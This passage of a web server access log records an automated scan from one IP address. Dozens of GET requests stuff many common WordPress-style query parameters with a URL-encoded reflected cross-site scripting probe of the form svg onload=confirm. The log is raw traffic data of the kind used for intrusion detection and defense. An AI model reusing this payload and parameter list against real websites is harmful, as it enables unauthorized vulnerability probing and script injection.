d%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:13 +0000] GET /?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:13 +0000] GET /?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:13 +0000] GET /?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:13 +0000] GET /?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:13 +0000] GET /?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:14 +0000] GET /?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:14 +0000] GET /?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:14 +0000] GET /?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:14 +0000] GET /?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:14 +0000] GET /?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:14 +0000] GET /?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:14 +0000] GET /?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:14 +0000] GET /?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:15 +0000] GET /?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:15 +0000] GET /?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:15 +0000] GET /?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:15 +0000] GET /?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:15 +0000] GET /?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:15 +0000] GET /?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:15 +0000] GET /?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:16:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:16:30:51 +0000] GET /?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:52 +0000] GET /?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:30:52 +0000] GET /?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xs